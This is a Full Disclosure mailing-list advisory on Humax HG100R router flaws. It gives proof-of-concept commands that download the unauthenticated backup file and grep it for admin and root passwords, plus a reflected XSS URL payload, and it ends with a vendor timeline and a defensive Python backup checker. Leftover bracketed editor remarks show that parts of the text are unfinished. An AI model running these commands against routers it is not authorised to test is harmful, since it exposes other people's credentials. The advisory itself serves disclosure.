
List:       full-disclosure
Subject:    [FD] Humax Digital HG100R multiple vulnerabilities
From:       The Gambler <gambler () tutanota ! com>
Date:       2017-06-29 21:11:56
Message-ID: KnpgY6y--3-0 () tutanota ! com

Humax Digital HG100R multiple vulnerabilities
Device: Humax HG100R
Software Version: VER 2.0.6

- Backup file download (CVE-2017-7315)
An issue was discovered on Humax Digital HG100R 2.0.6 devices, a modem commonly used by ISPs to
provide ADSL internet service to household and small business users. (CHECK THIS INFO)
Downloading the backup file does not require credentials or any authentication, and the router
credentials are stored in plaintext inside the backup.

PoC
wget http://192.168.0.1/view/basic/GatewaySettings.bin
strings GatewaySettings.bin | grep -A 1 admin
--------------------------------------------------------------------------------

- Reflected XSS (CVE-2017-7316)
An issue was discovered on Humax Digital HG100R 2.0.6 devices. (BRIEFLY DESCRIBE WHAT REFLECTED
XSS IS AND SAY WHAT CAN BE DONE TO THE USER WITH IT.) There is reflected XSS on the 404 page.

PoC
http://192.168.0.1<script>alert('XSS')</script>
--------------------------------------------------------------------------------

- Default credentials to router's web application not declared in the manual (CVE-2017-7317)
(I DID NOT UNDERSTAND THIS SENTENCE. WHAT DID YOU MEAN?) An issue was discovered on Humax
Digital HG100 2.0.6 devices. The attacker can find the root credentials in the backup file.

PoC
wget http://192.168.0.1/view/basic/GatewaySettings.bin
strings GatewaySettings.bin | grep -A 1 root


Timeline
2017-03-15 - First contact. Ignored by the vendor.
2017-03-21 - Second contact.
2017-03-22 - The vendor answered asking about the vulnerability.
2017-03-27 - Asked the vendor for its security team's contact information to report the vulnerability.
2017-03-28 - The vendor answered saying that it is an old product, and they will check these vulnerabilities in the new products.
2017-03-28 - Asked the vendor about a patch.
2017-03-30 - Asked the vendor again about the patch.
2017-04-03 - Notified the vendor about the disclosure after 90 days, even without a patch.
2017-04-19 - Asked the vendor about a patch.
2017-05-08 - Asked the vendor about a patch.
2017-06-29 - Disclosure.
2017-06-29 - Disclosure.


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
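
Added example, not part of the original advisory: a device owner's check of an exported backup file for the plaintext exposure described under CVE-2017-7315 and CVE-2017-7317, reproducing `strings | grep -A 1` in Python while reporting only the length of the neighbouring value. The sample blob and the function names are constructed for illustration; the advisory does not describe the real file layout.

```python
import re

# Runs of 4+ printable ASCII bytes, the default threshold of `strings`.
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")

# Constructed sample, NOT the real GatewaySettings.bin layout (the advisory
# does not describe it). Binary padding separates the readable fields.
SAMPLE_BACKUP = (
    b"\x00\x01\x7f\xfeHG100R\x00\x00\x05"
    b"admin\x00\x08Example1\x00\x00\xff"
    b"\x00\x04root\x00\x0bExamplePass\x00"
)


def printable_runs(blob):
    """Return (offset, text) for each printable run, like `strings -t d`."""
    return [(m.start(), m.group().decode("ascii"))
            for m in PRINTABLE_RUN.finditer(blob)]


def find_plaintext_accounts(blob, accounts=("admin", "root")):
    """Flag account names that are followed by another readable string.

    Mirrors `strings FILE | grep -A 1 NAME`. A hit is an indicator to review,
    not proof of a password; only the length of the neighbour is reported so
    the result can be shared without leaking the value.
    """
    runs = printable_runs(blob)
    findings = []
    for i, (offset, text) in enumerate(runs[:-1]):
        name = next((a for a in accounts if a in text), None)
        if name is None:
            continue
        next_offset, next_text = runs[i + 1]
        findings.append({"account": name, "offset": offset,
                         "next_offset": next_offset,
                         "next_length": len(next_text)})
    return findings


if __name__ == "__main__":
    for f in find_plaintext_accounts(SAMPLE_BACKUP):
        print(f"{f['account']}: readable {f['next_length']}-byte string "
              f"at offset {f['next_offset']}, review and rotate")
```
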

